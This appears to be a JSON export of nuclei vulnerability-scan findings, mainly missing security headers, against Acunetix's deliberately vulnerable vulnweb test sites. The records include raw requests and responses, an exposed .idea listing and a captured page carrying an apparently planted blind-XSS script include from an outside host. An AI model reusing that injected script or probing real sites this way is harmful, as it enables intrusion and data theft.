attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 514, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:17.415Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 515, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:17.561Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 516, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:17.698Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 517, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:17.863Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 518, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:18.010Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 519, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:18.160Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 520, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:18.309Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 521, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:18.449Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n 